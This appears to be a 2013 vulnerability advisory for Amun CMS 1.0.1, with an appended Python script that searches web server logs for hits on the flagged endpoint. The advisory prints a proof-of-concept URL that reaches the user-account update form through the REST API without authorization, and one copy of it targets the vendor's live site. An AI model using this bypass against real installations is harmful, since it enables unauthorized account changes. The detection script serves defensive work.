Amun CMS 1.0.1 REST API Access Bypass
Posted on 12 October 2013
Amun CMS 1.0.1 REST API No Access Restriction

Author    : syst3m_f4ult
Homepage  : http://amun-project.org
Vendor    : Amun CMS
Version   : 1.0.1 (probably all versions)
Tested on : ubuntu 12.04
Date      : 2013-10-11

-----------------------------------------------------------------------
I. POC & Exploit
-----------------------------------------------------------------------

Default : http://127.0.0.1/
exploit : http://127.0.0.1/index.php/api/user/account/form?format=xml&method=update&id=1
Demo    : http://amun-project.org/index.php/api/user/account/form?format=xml&method=update&id=1
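For defenders, one way to find requests to the endpoint named in the PoC in web server access logs. This is an added example, not part of the original advisory or of the Amun project; the combined log format, the function name `find_form_requests`, and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote

# Path taken from the advisory's PoC URL.
FORM_PATH = "/index.php/api/user/account/form"

# Apache/nginx "combined" log format (assumed; adjust to your server).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<verb>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def find_form_requests(lines):
    """Return one dict per logged request that hit the account form endpoint."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        raw_path, _, query = m.group("target").partition("?")
        # Percent-decode and collapse repeated slashes so variants still match.
        path = re.sub(r"/{2,}", "/", unquote(raw_path)).lower()
        if not path.rstrip("/").endswith(FORM_PATH):
            continue
        qs = parse_qs(query)
        hits.append({
            "ip": m.group("ip"),
            "time": m.group("ts"),
            "status": int(m.group("status")),
            "method": qs.get("method", [""])[0],
            "id": qs.get("id", [""])[0],
            "answered": m.group("status").startswith("2"),  # server returned 2xx
        })
    return hits

# Constructed sample lines, not real traffic.
SAMPLE = [
    '203.0.113.7 - - [12/Oct/2013:10:01:02 +0000] "GET /index.php/api/user/account/form?format=xml&method=update&id=1 HTTP/1.1" 200 1843 "-" "curl/7.22.0"',
    '198.51.100.4 - - [12/Oct/2013:10:01:09 +0000] "GET /index.php/news HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [12/Oct/2013:10:01:15 +0000] "GET //index.php/api/user/account/%66orm?format=xml&method=update&id=2 HTTP/1.1" 403 210 "-" "curl/7.22.0"',
]

if __name__ == "__main__":
    for hit in find_form_requests(SAMPLE):
        print(hit)
```

Entries with `answered` set to true are the ones to correlate with session or authentication logs, since the access log alone does not show whether the caller was logged in.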
